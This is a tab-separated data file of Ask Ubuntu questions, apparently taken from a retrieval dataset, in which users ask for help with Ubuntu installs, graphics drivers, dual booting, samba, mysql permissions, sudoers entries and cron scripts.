403432	independence between sudo and the instruction it receives as an argument	i do n't understand why the directory dir1 is n't shown with the same colour . although this may look unimportant , it seems to me that this is a violation of the so oftenly mentioned principle of independence in computing ( i have professors who mention it during each lecture ) . i know that 'ls ' is an argument of 'sudo ' , but should n't 'sudo ' just change privileges and then not interfere in any way with the instruction it receives as an argument ?
403433	how can i uninstall samba after building from source ?	i installed samba 4 from source , but i might have missed some steps or not correctly followed the instructions because it did n't work ; i got too many error messages . the way i installed it was : $ git clone git : //git.samba.org/samba.git samba-master changed to samba-master directory , then : $ ./configure $ make $ make install finally i got the install success message . how can i completely uninstall samba 4 and try installing again ? with the command : sudo make uninstall i get `` make : no rule to make target uninstall '' stop . what can i do ?
403434	removing a bad sector from an ntfs partition . badblocks gave me an output . now what ?	i used badblocks to scan a partition on my hdd for bad sectors and it gave me the following output ... from what i understand it looks like `` one scratch on the hdd '' ... anyways i ca n't partition with gparted because of this bad sector ( my previous question : i need help with increasing the size of the file-system partition . partitioning-o-phobia ! ) gparted still gives me `` a red exclamation mark '' on the drive after the badblocks test . ... now what ? i have also tried chkdsk on windows but still gparted gives the red mark how do i mark this bad sector so that gparted can do its work ? : ) ... plz exclude answers about `` replacing the hdd '' i know i can do that .
403435	how to get a list of all the commands available for ubuntu ?	i want to start using the terminal more often , but i do n't know what are the different commands available to me . is there a way to list all the different commands that i can make use of ?
403438	install driver on windows ? same for ubuntu ?	i just have a quick question , i 'm planning on dual booting my computer with windows/ubuntu 12.04 . if i install a driver for a graphic card on windows ? would i have to do the same for ubuntu or does it transfer over ? best ,
403443	usb keyboard is not working 13.04	my old usb keyboard is n't working with ubuntu server 13.10. i 've searched and google but cant find a fix . i cant plug an old keyboard with ps/2 connection in it . but my usb mouse is working.i m using lenevo thinkcentre m72e.pls help .
403449	how can i increase ubuntu storage ?	i installed ubuntu as a secondary os on my laptop , i assigned 6 gb for it and now its full and i want to increase the storage to 50 gb without reinstalling the os
403450	ubuntu gnome 13.04 print as pdf does not work	the function `` print to file '' does n't have any output . i want to print for example a web page just as pdf . when the print dialogue is open , i select `` print to file '' . a progress bar is displayed and finishes , but a pdf ca n't be found anywhere . my file manager is nautilus .
403451	finding url to virtualbox ubuntu apache2 server	i am new to ubuntu and have apache2 running in a virtual box on my machine . i am trying to access this server on my windows machine.. i am assuming that i need to find the ipaddress and the port to access the server . i have tried identifying my ipaddress using the following lfconfig and then checking which port apache is running lsof -i etc.. i 'm not really sure what all this information means.. but i am assuming that if i find the ip address and port i can navigate to it on my windows pc . e.g . http : //10.0.2.15:27017 anyway i have tried just about every cominbation of ipadress/port listed and ca n't figure it out . do i need to implement any port forwarding ? i found the following screen in my vm settings but do n't know what to try from there . would appreciate any direction or guidance on how i can access the apache2 server .
403453	how to install latest version of tomcat on ubuntu using apt ?	apt-get install will only install 7.0.26 , what is the prescribed way to get the latest version which is 7.0.47 . i 'm on 12.04 . i am trying to avoid manual download and install .
403455	will ubuntu work smoothly with 1gb ram and intel atom dual core processor ?	i want to use ubuntu in my computer . asus eee pc intel atom dual core processor 1gb ram 360gb hdd will it work without glitches and slow performance with this ?
403459	turning composite off in unity	( note : this question is related to : ca n't get 3d vision working , i 'm creating a `` sub-question '' in case someone could be interested in composite but not about nvidia stuff ) . to make it short : i need to turn off the composite option ( via xorg.conf ) , however , when i do so , unity refuses to start : i 'm getting a black screen after login . is there anyway currently to turn composite off in unity ? various informations : glxinfo result xorg.conf ubuntu : 13.10 thanks for reading !
403461	lamp on port 80 from the desktop with remote access to 2nd file server	i am a newbie to ubuntu . ( ubuntu 13.10 desktop 64-bit ) i 'm attempting to run lamp on two pcs i have one reoccurring problem : running applications from /home : i want to run drupal and wordpress on ports 80 , but from the desktop . i understand that tasksel installs as root , binding these ports , but only as root . simply altering the virtualhost file with the with the servername drupal.showmemn.com directive does not do the job . in addition , it appears i can not bind any port below 1023 without root privileges . the second issue involves remote access to a second pc ( server 2 ) running ubuntu 12.04 lts ( 32-bit ) . i want this to be a file server that remote users can upload files to . i ultimately want the file server to be completely independent of the applications run on the server . please help ! any help would be greatly appreciated . thanks !
403462	the wifi switch turn bluetooth instead - hp probook 6470b	i am currently enjoying my ubuntu 13.10 on my hp probook 6470b but i can not get the wifi to work ( while it works perfectly fine on windows in dual boot ) note 1 : in the network icon in statusbar , only the wired connection is shown . note 2 : the wifi harware key is disabled ( orange color ) and when i try to turn it on , the wifi icon appear in statusbar . so , following some topics on internet , this is the info i can give **~ $ lshw -c network** *-network description : network controller product : bcm43228 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:24:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:19 memory : d4400000-d4403fff so , i guess this is working and the hardware is found ! here are some commands i have tried without any effect : cve @ cve : ~ $ sudo dmesg | grep wlan0 cve @ cve : ~ $ dmesg | grep blue cve @ cve : ~ $ sudo /etc/init.d/networking start error : calling a sysvinit script on a system using upstart is n't supported . please use the 'service ' command instead . cve @ cve : ~ $ sudo service wireless start wireless : unrecognized service cve @ cve : ~ $ sudo /etc/init.d/networking restart error : calling a sysvinit script on a system using upstart is n't supported . please use the 'service ' command instead .
403467	d-bus error after upgrading	i upgraded my ubuntu from 13.4 to 13.10 . but my vidalia can run correctly . morteza @ com : ~ $ vidalia ( process:2605 ) : gconf-warning ** : client failed to connect to the d-bus daemon : an apparmor policy prevents this sender from sending this message to this recipient , 0 matched rules ; type= '' method_call '' , sender= '' ( null ) '' ( inactive ) interface= '' org.freedesktop.dbus '' member= '' hello '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.dbus '' ( bus ) ( < unknown > :2605 ) : gconf-warning ** : client failed to connect to the d-bus daemon : an apparmor policy prevents this sender from sending this message to this recipient , 0 matched rules ; type= '' method_call '' , sender= '' ( null ) '' ( inactive ) interface= '' org.freedesktop.dbus '' member= '' hello '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.dbus '' ( bus ) ( < unknown > :2605 ) : ibus-warning ** : unable to load /var/lib/dbus/machine-id : failed to open file '/var/lib/dbus/machine-id ' : permission denied how to solve it ?
403469	mac goes black after nvidia driver update	i updated my nvidia graphics driver . it was version 304 . now it boots up to the loading screen and then it goes completely black . the computer is still running just no screen . i need help to get the screen back on . i do n't care if i loose all of my personal stuff . i just need it to work materials i have : one dysfunctional laptop running 12.04 lts 64bit one desktop pc running windows 7 64bit a usb drive and time
403472	samba4 provision error	after instlling samba4 with the last message to be successful , i 've tried to provision but got the following errors : ldb : module schema_load intialization failed : no such object ldb : module rootdse intitialization failed : no such object ldb : module samba_dsdb initilization failed : no such object ldb : unable to load modules for /usr/local/samba/private/sam.ldb/ null smbd-connect failed ufs.connect failed error class samba provision provisionerrror provision failed your file system or build does not support posix acls , which s3fs reqiores - try mounting file system acl . file /usr/local/samba/lib/python2.7/site-package/samba/netcmd/domain.py line 427 in run i 've tried the provision many times . is there any way to fix this samba4 installation ? thank you
403473	encfs mysql datadir : errcode : 13	i 'm using encfs to encode the /var/lib/mysql data directory , but mysql returns errcode : 13 at any attemp of create tables or databases . to do so , i moved all files to a temporary dir , created the encfs and move the temporary contents to the new mounted fs . also i have some scripts that stops apache and mysql , mounts the dirs ( i also encode /var/www , without any problem ) , and then restart them . /var/lib/mysql and all files and subdirs are user and group mysql , with write and read permissions : $ ls /var/lib/mysql -cal total 28996 drwxrwxrwx 8 mysql mysql 4096 ene 9 22:20 . drwxr-xr-x 68 root root 4096 ene 9 19:10 .. -rw-r -- r -- 1 mysql mysql 0 ene 9 21:07 debian-5.5.flag -rw-rw -- -- 1 mysql mysql 18874368 ene 9 21:07 ibdata1 -rw-rw -- -- 1 mysql mysql 5242880 ene 9 22:20 ib_logfile0 -rw-rw -- -- 1 mysql mysql 5242880 ene 9 21:07 ib_logfile1 drwx -- -- -- 2 mysql mysql 16384 ene 9 21:07 mysql -rw-rw -- -- 1 mysql mysql 6 ene 9 21:07 mysql_upgrade_info drwx -- -- -- 2 mysql mysql 4096 ene 9 21:07 performance_schema drwx -- -- -- 2 mysql mysql 4096 ene 9 21:07 phpmyadmin drwx -- -- -- 2 mysql mysql 4096 ene 9 21:07 database1 drwx -- -- -- 2 mysql mysql 4096 ene 9 21:07 database2 drwx -- -- -- 2 mysql mysql 4096 ene 9 21:07 test $ sudo ls /var/lib/mysql/phpmyadmin -cal total 440 drwx -- -- -- 2 mysql mysql 4096 ene 9 21:07 . drwxrwxrwx 8 mysql mysql 4096 ene 9 22:20 .. -rw-rw -- -- 1 mysql mysql 65 ene 9 21:07 db.opt -rw-rw -- -- 1 mysql mysql 8682 ene 9 21:07 pma_bookmark.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_bookmark.myd -rw-rw -- -- 1 mysql mysql 1024 ene 9 21:07 pma_bookmark.myi -rw-rw -- -- 1 mysql mysql 12964 ene 9 21:07 pma_column_info.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_column_info.myd -rw-rw -- -- 1 mysql mysql 4096 ene 9 21:07 pma_column_info.myi -rw-rw -- -- 1 mysql mysql 8704 ene 9 21:07 pma_designer_coords.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_designer_coords.myd -rw-rw -- -- 1 mysql mysql 2048 ene 9 21:07 pma_designer_coords.myi -rw-rw -- -- 1 mysql mysql 8730 ene 9 21:07 pma_history.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_history.myd -rw-rw -- -- 1 mysql mysql 4096 ene 9 21:07 pma_history.myi -rw-rw -- -- 1 mysql mysql 8644 ene 9 21:07 pma_pdf_pages.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_pdf_pages.myd -rw-rw -- -- 1 mysql mysql 1024 ene 9 21:07 pma_pdf_pages.myi -rw-rw -- -- 1 mysql mysql 8800 ene 9 21:07 pma_relation.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_relation.myd -rw-rw -- -- 1 mysql mysql 4096 ene 9 21:07 pma_relation.myi -rw-rw -- -- 1 mysql mysql 8708 ene 9 21:07 pma_table_coords.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_table_coords.myd -rw-rw -- -- 1 mysql mysql 2048 ene 9 21:07 pma_table_coords.myi -rw-rw -- -- 1 mysql mysql 8656 ene 9 21:07 pma_table_info.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_table_info.myd -rw-rw -- -- 1 mysql mysql 2048 ene 9 21:07 pma_table_info.myi -rw-rw -- -- 1 mysql mysql 9149 ene 9 21:07 pma_tracking.frm -rw-rw -- -- 1 mysql mysql 0 ene 9 21:07 pma_tracking.myd -rw-rw -- -- 1 mysql mysql 2048 ene 9 21:07 pma_tracking.myi -rw-rw -- -- 1 mysql mysql 8652 ene 9 21:07 pma_userconfig.frm -rw-rw -- -- 1 mysql mysql 28 ene 9 21:07 pma_userconfig.myd -rw-rw -- -- 1 mysql mysql 2048 ene 9 21:07 pma_userconfig.myi and check that the deamon runs as mysql : user @ server : ~ $ sudo ps -eo pid , pgrp , ppid , comm , cgroup , euser , egroup , fuser , fgroup , ruser , rgroup , suser , sgroup , label| grep mysql 2475 2475 1 mysqld - mysql mysql mysql mysql mysql mysql mysql mysql /usr/sbin/mysqld the strange thing is that the service runs , and mysql is able to read all files ( it shows previously created databases and tables without problem ) . but when i try to create or modificate a database or table , it returns errcode 13 , but i do can update existing tables . also , selinux is disbled : $ sudo sestatus selinux status : disabled and mysqld is in complain mode in apparmor : ~ $ sudo apparmor_status apparmor module is loaded . 17 profiles are loaded . 16 profiles are in enforce mode . /sbin/dhclient /usr/bin/evince /usr/bin/evince-previewer /usr/bin/evince-previewer//launchpad_integration /usr/bin/evince-previewer//sanitized_helper /usr/bin/evince-thumbnailer /usr/bin/evince-thumbnailer//sanitized_helper /usr/bin/evince//launchpad_integration /usr/bin/evince//sanitized_helper /usr/lib/networkmanager/nm-dhcp-client.action /usr/lib/connman/scripts/dhclient-script /usr/lib/cups/backend/cups-pdf /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper//chromium_browser /usr/sbin/cupsd /usr/sbin/tcpdump 1 profiles are in complain mode . /usr/sbin/mysqld 2 processes have profiles defined . 1 processes are in enforce mode . /usr/sbin/cupsd ( 742 ) 1 processes are in complain mode . /usr/sbin/mysqld ( 2475 ) 0 processes are unconfined but have a profile defined . so , i do n't know where else i should search .
403475	can not boot to windows after installing ubuntu and running boot-repair	i installed ubuntu 13.04 on to a 2nd drive ( sbd2 ) whilst the first driver ( sbda ) has windows 7 . when i rebooted i was not given the grub bootloader and booted straight to ubuntu . after running boot-repair , i now get the grub boot loader but with no windows option . here is the output from boot-repair : http : //paste.ubuntu.com/6726912/ please can you help me to restore the option of booting to windows 7 . i can see my windows install ntfs partition mounted in ubunutu tia
403477	restore unity greeter	i 've installed xfce to test this desktop environment , but when i decide to switch back to unity , uninstalling the xfce packages , the lightdm keeps equal like xfce , and i want to restore the unity one . i think that is called unity greeter . can someone help me ?
403482	are pdf files opensouce ?	i was just wondering if pdf formats are opensource . i 've seen openoffice save a document in odt format in contrast to doc or docx . is there alternate file format to pdf ?
403484	multiply 2 array index variables shell programming	how do i multiply 2 array index variables given the following foo= ( 1 2 ) bar= ( 0.1 0.2 ) foobar= $ ( ( foo [ 1 ] *price [ 1 ] ) ) # this is wrong echo `` $ foobar '' current output : 0 correct/expected output : 0.4
403485	help , ca n't empty my trash folder on external hdd	i 've been searching for this problem on the webs but none of the solutions i 've found worked for me . the problem is that i have an external hard drive and the trash folder wo n't delete . the complete path of the problem folder : /media/elements/.. .trash-1000/expunged/2969272896 for some reason if i just press delete when that folder is selected it delete 's as a normal folder , but it will always reappear . deleting the folder in windows wo n't work either . there are no files in the folder .
403489	updating from 12.10 to 13.10 with windows ?	i would like to know if it is possible to update my current version of ubuntu ( 12.10 ) to the latest ( 13.10 ) through windows . apparently my current version has crashed due to some errors . i ca n't enter the current version that exists : ( . also within the current version i was n't able to update through the software updater as it never showed me the availability of 13.10 even though i had toggled the option for new version notification . all these problems started when i downloaded openshot to try and edit a few videos . due to compatibility issues i had to download a few packages and replace other existing packages . ultimately i ca n't even enter ubuntu/ i 'm shown an error like low graphics settings or ca n't detect graphics.. something in those lines : ' ( i have an pentium d processor machine with 2.5gb ram and barely sufficient hard disk space . i was running ubuntu as a dual boot . yes this is a wubi install of ubuntu 12.10 completed from within windows . please help ! !
403492	cd/dvd not mounting some cd/dvd 's	running ubuntu 13.10 with a lg cd/dvd writer it runs some cd/dvd 's but certain cd's/dvd 's cant mount from it and thus i 'm not able to run the installation file in wine any clue ? it 's a parts catalog for your boat spares from mercury . the light comes on but it seems like it can not initiate . i have done the usual test put another cd in and yes it works . try the cd on another computer ( win - and it works )
403493	enabling integrity measurement architecture in ubuntu ?	hi how can i enable integrity measurement architecture ( ima ) in ubuntu 12.04 lts ? i have a value idea that it is done somewhere by changing some configuration but donât know how to get into those configuration settings ?
403496	duplicity restore problems	a while ago i ran a backup of my system to a external hd and need to restore some of the files that should of been contained in the backup . i have tried deja dup and duplicity command line to no avail . i have a directory that contains several files in the format duplicity-full. # # # # # # # # # # # # # # .vol # .difftar.gz . when i try to use deja dup i do n't get any files listed and when i try command duplicity list-current-files -- no-encryption file : //media/andy/extshared/backup/duplicity i get : local and remote metadata are synchronized , no sync needed . last full backup date : none traceback ( most recent call last ) : file `` /usr/bin/duplicity '' , line 1414 , in < module > with_tempdir ( main ) file `` /usr/bin/duplicity '' , line 1407 , in with_tempdir fn ( ) file `` /usr/bin/duplicity '' , line 1345 , in main list_current ( col_stats ) file `` /usr/bin/duplicity '' , line 610 , in list_current sig_chain = col_stats.get_signature_chain_at_time ( time ) file `` /usr/lib/python2.7/dist-packages/duplicity/collections.py '' , line 974 , in get_signature_chain_at_time raise collectionserror ( `` no signature chains found '' ) collectionserror : no signature chains found i have searched both google and stackexchange for a solution but have not come up with any solutions . i hope someone can point me in the right direction . ubuntu 13.10 thanks allot for the help ! andy
403499	shortcut keys for change of input sources does n't work	i have he and de as input source . according to the settings menu the shortcut for changing the input source should be `` super + space '' . i understand that `` super '' is identical with the `` windows key '' . problem : it does n't work for me . if for example now i hit `` super + space '' nothing changes though actually input source should switch from de to he . any idea what 's wrong ? details : ubuntu 13.10 , unity desktop
403500	create single-track ogg/mp3 files from monolithic flac file with embedded cue sheet	my audio cds are archived as monolithic flac files ( one large file per cd ) with embedded cue sheet . i am looking for a way to create ogg vorbis ( or mp3 ) files from those flac files for my hardware audio player . preferably , the following criteria are met : command-line driven for easy automation . one file per track . ( so a single flac file gives multiple ogg-files . ) automatic addition of meta-data to the files , either by reading the meta-data from the flac files ( which was set with flactag before ) , or by getting the data from the musicbrainz server . place all the files into a new folder `` artist - album title '' , and name the files to something like `` track number - track title '' .
403502	will ubuntu erase my my current os if i install it from a bootable usb ?	okay , so i have the demo ubuntu up and running on my bootable usb device . but i want to install it so that ubuntu will save my files that i install and download etc . but if i choose to install ubuntu , will it install on my usb device or will it install on my hard drive and erase windows 8 ?
403509	13.10 radeon 9800xt driver limited to 1024x768	i 'm brand new to linux ( just learned how to open a terminal yesterday ) . when i installed ubuntu 13.10 x64 , it set my resolution at 1024x768 and would not let me set it higher so i figured that i needed to change my drivers . in my system settings window it says gallium 0.4 on r360 which is correct ( r360 = my ancient radeon 9800xt ) . this page says that it officially supports radeon 9800xt . is gallium the open source driver ? if not , is there a guide on how to install the open source driver ? if the correct driver is already installed then i guess there is a typo on that radeon driver page because my card must not be supported . thanks
403511	ca n't get past splash screen on 13.10 boot	i have just updated to 13.10 . the system boots and loads , and the gui login screen appears . after logging in , however , i am left with the colorful splash screen and nothing else happens . i can use ctl-alt-f1 to get to a terminal login , but i do n't know how to analyze this problem or to converge on a solution . together with the ubuntu upgrade , i installed a graphics card ... radeon r7 260x . according to the amd site , there is a linux driver for this card , but i do n't know how to install it , and i do n't even know if that is the problem . any help would be much appreciated .
403512	connection was refused by other side : 111 : connection refused	i am running 25 scrapy jobs , each has 50 concurrent requests on a heavy machine ( with ubuntu 12.04.3 lts ) . i am using proxies to send requests . after 15 minutes or so , i get this error from almost all of the requests : connection was refused by other side : 111 : connection refused . i contacted the proxy service provider and they say that this problem is from handling sockets on my side . so my scripts send 1250 concurrent requests . is there anyway i could find out where the problem is ? is there a connection limit on ubuntu ?
403516	dns resolution fails , and /etc/resolv.conf is n't persistent , how can i force the use of certain dns servers ?	i have this persistent and annoying issue . when i first boot up , my desktop ca n't resolve any dns names unless i edit the /etc/resolv.conf file and remove the entry for name-server 127.0.0.1 and change it to 8.8.8.8 this is only a temporary fix because this file is reset after each reboot . i googled this for hours and tried multiple solutions but ca n't find a solution . i think there also might be a bug associated with this issue ? not sure though . can someone help ?
403519	purple screen after installing ubuntu . drivers are not installing	at startup a purple screen , changing `` secure boot '' and the system is switched . nomodeset does not eliminate the purple screen i 'm installing the drivers for the video card and reboot the system : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current purple screen again . changing `` secure boot '' and i 'm seeing cursor-cross on a black screen .
403520	ubuntu on advent torino x700	i am intested in buying the advent torino x700 . i do not like windows 8 and i already use ubuntu so i would want to install ubuntu desktop onto it . i noticed that this computer is not on the list of certified hardware , no advent computers are . does this mean ubuntu wo n't work on it ? will i be able to put ubuntu on it ? if so , how ? just by buying a disk and booting off of the disk ? or is my hardware not supported ? thanks !
403522	ho to upgrade ubuntu 12.04 to ubuntu 13.10 ?	i have to upgrade an ubuntu 12.04 to the last stable ubuntu 13.10 but i have some doubts about how do it : 1 ) the first doubt is related to the fact that reading online seems that is not a smart thing update directly from 12.04 to 13.10 but i read that is better do it by steps : from 12.04 to 12.10 , then from 12.10 to 13.04 and finally from 13.04 to 13.10 is it true ? 2 ) trying to perform the previous operation ( the update from 12.04 to 12.10 ) following this official tutorial : https : //help.ubuntu.com/community/quantalupgrades i have followed the previous tutorial and i have activate the notification `` for any new version '' of the system but in the update manager appear to me a strange thing , infact it say to me that is available the new 14.04 release reading online i see that 14.04 will be the new lts and that this will be available in april of 2014 , so what is this ? is it a beta version or something like this ? i ca n't chose to upgrade to 12.10 or 13.10 . what can i do to upgrade my system to the last stable version ? tnx andrea
403523	root privileges for windows domain admin	this is my sudoers file , i 'm currently connected to a windows domain and want to give all domain admins root privileges . when i add in the line : % contoso.com\\user1 all= ( all ) all and sign on as a windows domain admin , it still wo n't give that users root privileges . can anyone tell me what i might be doing wrong ? thanks ! # this file must be edited with the 'visudo ' command as root . # # please consider adding local content in /etc/sudoers.d/ instead of # directly modifying this file . # # see the man page for details on how to write a sudoers file . # defaults env_reset defaults secure_path= '' /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin '' # host alias specification # user alias specification # cmnd alias specification # user privilege specification root all= ( all : all ) all # members of the admin group may gain root privileges % admin all= ( all ) all % contoso.com\\user1 all= ( all ) all # allow members of group sudo to execute any command % sudo all= ( all : all ) all # see sudoers ( 5 ) for more information on `` # include '' directives : # includedir /etc/sudoers.d
403528	wubi unsuccessful boot-repair	followed direction listed at : https : //help.ubuntu.com/community/boot-repair used live usb installer > try ubuntu > downloaded boot-repair boot-repair started automatically after install . used `` recommended repair '' option that ended with successful repair , `` reboot your system '' . report at url : ( paste.ubuntu.com/6726786 ) neither wubi versions started . previous stable version ( 3.8.0-34~generic ) and new 3.8.0.35 ( that was unsuccessfully installed which missed-up the os ) ended up with missing modules ( cat/proc/nodules ; ls /dev ) alert ! /dev/disk/by-uuid/xxxxxxx ) does not exist . dropping to a shell ! busybox v1.18.5 built-in shell ... ... ( initramfs ) _ _ although , i can get to gnu grub v.1.99-21ubuntu3.14 command line before selecting os version to boot from . i had the older one rescued yesterday with generic graphic driver but it went all-bad after attempting > system sittings > additional drivers . now , can i fix one of the two installed versions from this command line ? if no , what maybe my best option before a full deleting of wubi and new installation that will delete a few files left since last back-up .
403530	how to solve the broken letters in ubuntu 12.04 lts ?	i am having a problem like a white line in the middle of the words and some letters are broken in all the file names and folder names [ for e.g . in letter `` a '' , a part of the letter is not displayed properly ] in ubuntu 12.04 lts . help me ! !
403534	help with a simple script	i have made a simple backup script code : function backups_remove_file { echo `` '' echo `` 2 . make backups of files ( s ) '' echo `` '' echo `` which file you wan na to make backups ? '' read back echo `` what 's the file 's name should be after backups ? and where ? '' read after read -p `` continue ( y/n ) ? '' cont1 if [ `` $ cont1 '' == `` y '' ] ; then tar -cvpzf `` $ after.tar.gz '' `` $ back '' echo `` backups file successful ! '' ; else echo `` backups file unsuccessful ! '' ; fi } but there is one small problem i could not fix it . the problem is when it comes into the screen which file you want to make backups ? if you write for example `` test '' after that , the next question what 's the file 's name should be after backups ? and where ? if you write for example `` test1 '' , then there will be a safety issue if they want to continue or not if type y it will directly : taking : test : can not state : no such file or directory tar : exiting with failure status due to previous errors backups file successful ! its should be backups file unsuccessful ! . what should i do to make right and will be `` backups file unsuccessful ! '' ? ?
403537	synaptic package manager broken packages	how to remove broken packages using synaptic package manager i already isntalled it but after selecting status it is not showing broken packages options it is only showing installed , installed ( manual ) not installed .
403541	is there a way to merge multiple gnome-terminal windows into a single tabbed window ?	from a tabbed gnome-terminal window , it 's easy to drag tabs out to live in their own window . is it possible to do the opposite , to merge two gnome-terminals into a single tabbed window ?
403545	ati mobility radeon 5730 driver causes black screen before login on ubuntu 13.10	im trying to install an ati driver for my ati mobility radeon hd 5730 , i have an asus n61jq . i tried catalyst 13.2 and 13.11 beta , but both of them causes black screen on the login screen , i can hear the ubuntu login screen sound . the xorg driver makes my notebook heat too much and the fan is always too noisy , i 'm afraid of burning something . i had ubuntu 12.04 with and an older ati driver that work nicely , but the amd site does not have the older catalyst for download . i used 12.xx does someone managed to solve this issue ? or have link for older ubuntu catalysts ?
403546	ca n't add nvidia apt-get repository	i ca n't add the needed repository to install nvidia-graphics-drivers-319 . i do n't understand why the key is not trusted . see the output of the needed commands : root @ barry-iii : /home/zombie # add-apt-repository ppa : ubuntu-x-swat/x-updates updated versions of x.org drivers , libraries , etc . for ubuntu . this ppa is for stable upstream releases of x.org components . if you 're looking for something even more bleeding-edge , please see the xorg-edgers ppa . while ubuntu does not `` officially/formally '' support these packages , if you discover problems when installing these debs please feel free to report bugs to launchpad . however , please make sure to clearly state that you are running packages from this ppa so we know the fixes need to come here . if you are upgrading from one release to another with this ppa activated , please install the ppa-purge package and use it to downgrade everything in here beforehand . sudo ppa-purge ppa : ubuntu-x-swat/x-updates will do it . [ directions for packaging drivers can be seen at https : //wiki.ubuntu.com/x/driverbuilding ] more info : https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmph015_y/secring.gpg ' created gpg : keyring `/tmp/tmph015_y/pubring.gpg ' created gpg : requesting key af1cdfa9 from hkp server keyserver.ubuntu.com gpg : /tmp/tmph015_y/trustdb.gpg : trustdb created gpg : key af1cdfa9 : public key `` launchpad ppa for ubuntu-x '' imported gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok root @ barry-iii : /home/zombie # apt-get install nvidia-graphics-drivers-319 reading package lists ... done building dependency tree reading state information ... done e : unable to locate package nvidia-graphics-drivers-319 root @ barry-iii : /home/zombie #
403548	windows does not start ?	well i checked and so are the two ubuntu 12.04 and windows 7 ultimate . but after restart the screen goes black for about 15 seconds and then start ubuntu . even not to do to bring up the grub . since the probe boot-disk-repair-tool and this is the result i get : http : //paste.ubuntu.com/6729018/ thanks
403551	help with alps touchpad on dell precison m6800	my trouble with alps touchpad on dell precision m6800 is that is if i use the default alps driver , the pointer jumps unstably with no help from configuration tools synaptic or tpconfig . it stabilizes if i set proto=imps in /etc/modprobe.d , but then i ca n't figure out how to disable tapping .
403553	how to list files in an incomplete rar ( or any other archive type ) file ?	i 'm downloading a rar file but it 's a huge file and i need to make sure that i 'm downloading what i really need . is there a way i can only list the files in this file before having to completely downloading it ? i 've seen such feature in free download manager on windows . i 've tried 7z l myfile.rar , rar lt lb myfile.rar and lt myfile.rar but none of this worked .
403555	unity stopped working after update	after i updated my 12.04.3 installation yesterday normal unity didnt show up . it keeps falling back to unity2d . also /usr/lib/nux/unity_support_test -p says my graphic card amd radeon hd 6700 series is not supported but is used to work for over a year . it maybe that some recent changes to unity package broke something . update history : http : //paste.ubuntu.com/6727763/ i have tried doing this : sudo apt-get install -- reinstall xserver-xorg-video-intel libgl1-mesa-glx libgl-mesa-dri xserver-xorg-core sudo dpkg-reconfigure xserver-xorg but now lightdm ist even starting . how to repair it to usable state ?
403556	asus eee 1001px - no sound on 12.04 , probably hardware problem , want to confirm	my brother had multiple issues running windows 7 ( possibly malware related ) , and he asked me to install ubuntu . one of his issues was that sound had stopped working completely . i have installed ubuntu 12.04 on his netbook , but sound is still gone . i 'm pretty much convinced at this point this is a hardware problem , but i just want to be sure it 's not caused by the new ubuntu install . what is the best way of confirming this ? thanks !
403558	using wget to retrieve files from autostart downloads	so i 'm making my own document of codes to run after a fresh install of ubuntu 13.10 and i want to try and keep everything in the command line ( as opposed to having to open a browser to download files ) . so i 've got wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb sudo dpkg -i google-chrome*.deb for downloading google chrome and wanted to make something similar for opera , so i have this link to download the opera browser .deb install file www.opera.com/download/get/ ? id=35889 & location=360 & nothanks=yes & sub=marine and have tried a variety of different things with wget but i ca n't seem to get it to download the .deb file . i would really like to do this from the command line instead of opening a browser to download the file . thanks .
403560	using a windows server as an ubuntu update repository	i am building an ubuntu server in a sandbox vm environment . the only system that has access to the internet is the windows wsus server . i would like to use this same server as an ubuntu update repository site for the ubuntu server i am building in the sandbox . is this possible first of all ? if it can be done , could someone give me some pointers on how to get this started . this is my first linux setup so i do not know any of the commands yet , i am building this to learn linux for my company . i have setup an ubuntu desktop and now an ubuntu server and i need/want to keep them updated . i just have to do it through this windows wsus server if it is possible . thanks in advance to anyone that is willing and able to help . almost forgot , i ca n't use the wsus server as a proxy server so there is no way to get this server access to the internet .
403563	looking for a package for a easy wmi installation process	i use ubuntu 12.04 lts and i wanted to test some ms windows services via wmi client . i finally found and modified a setup process ( see below ) , but it is very hard ( recompiling core etc. ) . is there a easier way to do that ? like a pre-packaged .deb-file to install via apt-get ? sudo aptitude install autoconf cd /data/tools/ wget http : //www.openvas.org/download/wmi/wmi-1.3.14.tar.bz2 tar -xvf wmi-1.3.14.tar.bz2 cd wmi-1.3.14/ sudo apt-get install build-essential sudo make sudo cp samba/source/bin/wmic /usr/local/bin/
403564	what do i have load to watch movies , netflix and such ?	what do i have load to watch movies netflix and such . by other questions posted there may be another site i should ask my question . got to start somewhere thanks jj
403565	ffmpeg preset question	i am trying to use this sh to broadcast on twitch , but i keep getting this error unrecognized option 'preset=fast' i am running ubuntu 13.10 , it is an asus laptop
403568	installing updates for mathematica 9 on ubuntu 13.10	i have installed mathematica 9 on ubuntu 13.10 . i was wondering how the program updates itself ? there is no repository for mathematica visible in the software center . i am just asking out of interest .
403569	crontab script entry not working	beginner here . i have a script called updatetf2.sh it 's contents # ! /bin/bash /etc/init.d/srcds stop ./steamcmd/sh +login anonymous +force_install_dir ./tf2 +app_update 232250 +quit /etc/init.d/srcds start located here ~/home/user/updatetf2.sh if i run ./updatetf2.sh from terminal it asks for a password , i type it in , and the script runs successfully . when i put it in sudo crontab -e like this 10 9 * * * /home/user/updatetf2.sh it does n't run . what am i doing wrong ? i 've seen simular tickets about this topic on here but have not seen a clear answer . thanks for the help .
